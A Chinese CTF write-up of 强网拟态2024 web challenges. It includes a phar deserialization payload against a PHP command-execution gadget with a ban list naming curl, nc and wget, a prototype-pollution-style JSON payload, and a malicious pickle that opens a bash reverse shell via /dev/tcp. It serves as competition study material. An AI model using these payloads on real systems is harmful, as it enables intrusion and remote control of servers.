强网拟态2024
capoo
看一下应该是先读取个文件,base64编码了一下
<?php
class CapooObj {
public function __wakeup()
{
$action = $this->action;
$action = str_replace("\"", "", $action);
$action = str_replace("\'", "", $action);
$banlist = "/(flag|php|base|cat|more|less|head|tac|nl|od|vi|sort|uniq|file|echo|xxd|print|curl|nc|dd|zip|tar|lzma|mv|www|\~|\`|\r|\n|\t|\ |\^|ls|\.|tail|watch|wget|\||\;|\:|\(|\)|\{|\}|\*|\?|\[|\]|\@|\\|\=|\<)/i";
if(preg_match($banlist, $action)){
die("Not Allowed!");
}
system($this->action);
}
}
header("Content-type:text/html;charset=utf-8");
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['capoo'])) {
$file = $_POST['capoo'];
if (file_exists($file)) {
$data = file_get_contents($file);
$base64 = base64_encode($data);
} else if (substr($file, 0, strlen("http://")) === "http://") {
$data = file_get_contents($_POST['capoo'] . "/capoo.gif");
if (strpos($data, "PILER") !== false) {
die("Capoo piler not allowed!");
}
file_put_contents("capoo_img/capoo.gif", $data);
die("Download Capoo OK");
} else {
die('Capoo does not exist.');
}
} else {
die('No capoo provided.');
}
?>
<!DOCTYPE html>
<html>
<head>
<title>Display Capoo</title>
</head>
<body>
<img style='display:block; width:100px;height:100px;' id='base64image'
src='data:image/gif;base64, <?php echo $base64;?>' />
</body>
</html>非预期:读一下start.sh,发现flag的命名,直接读取
#!/bin/sh
rm -f /docker-entrypoint.sh
# Get the user
user=$(ls /home)
# Check the environment variables for the flag and assign to INSERT_FLAG
# 需要注意,以下语句会将FLAG相关传递变量进行覆盖,如果需要,请注意修改相关操作
#if [ "$DASFLAG" ]; then
# INSERT_FLAG="$DASFLAG"
# export DASFLAG=no_FLAG
# DASFLAG=no_FLAG
#elif [ "$FLAG" ]; then
# INSERT_FLAG="$FLAG"
# export FLAG=no_FLAG
# FLAG=no_FLAG
#elif [ "$GZCTF_FLAG" ]; then
# INSERT_FLAG="$GZCTF_FLAG"
# export GZCTF_FLAG=no_FLAG
# GZCTF_FLAG=no_FLAG
#else
# INSERT_FLAG="flag{TEST_Dynamic_FLAG}"
#fi
# 将FLAG写入文件 请根据需要修改
#echo $INSERT_FLAG | tee /flag
#touch /flag
chmod 744 /flag-33ac806f
php-fpm & nginx &
echo "Running..."
tail -F /var/log/nginx/access.log /var/log/nginx/error.log预期:(赛后)
给了如此明显的文件上传点和过滤条件,显然是打phar反序列化
<?php
class CapooObj {
public function __construct($action){
$this->action=$action;
}
}
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'test');
$phar->setStub("GIF89a" . "< language='php'>__HALT_COMPILER();</>");
$phar->setMetadata(new CapooObj("whoami"));
$phar->stopBuffering();生成的文件gzip压缩一下,改成capoo.gif挂在服务器上面,第一个post去download
第二个直接触发:capoo=phar://capoo_img/capoo.gif
ez_pickler
看题目很明显是打pickle,首先是发现一个很熟悉的像nodejs里面原型链污染一样的 merge(),现场学一下
先把secret_key污染了再污染 safe_names 和 safe_modules
{
"username": 1,
"password": 1,
"__init__": {
"__globals__": {
"safe_modules": [
"os","builtins","eval","json","datetime","math","collections"
],
"safe_names": [
"sqrt", "exec", "system", "pow", "sin", "cos", "tan", "date", "datetime", "timedelta", "timezone", "loads", "dumps", "namedtuple", "deque", "Counter","defaultdict","eval", "echo","popen"
],
"secret_key": 111
}
}
}写文件
import pickle
import os
class Test:
def __reduce__(self):
return (os.system, ("bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'",))
def object():
object = Test()
data = {
'evil_data': object
}
return data
test = Test()
a = pickle.dumps(test)
print(a)
with open('test.pkl', 'wb') as file:
file.write(a)flag 图找不到了,只找到当时刚连上的图,唐的不看路径就找flag
spreader
没看懂,之后再学,xss 老是不太会
OnlineRunner
之后和 Java 内容一起学吧